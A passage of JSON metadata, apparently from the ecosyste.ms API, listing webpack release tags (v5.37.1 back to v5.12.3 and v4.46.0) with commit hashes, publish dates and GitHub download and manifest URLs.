37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z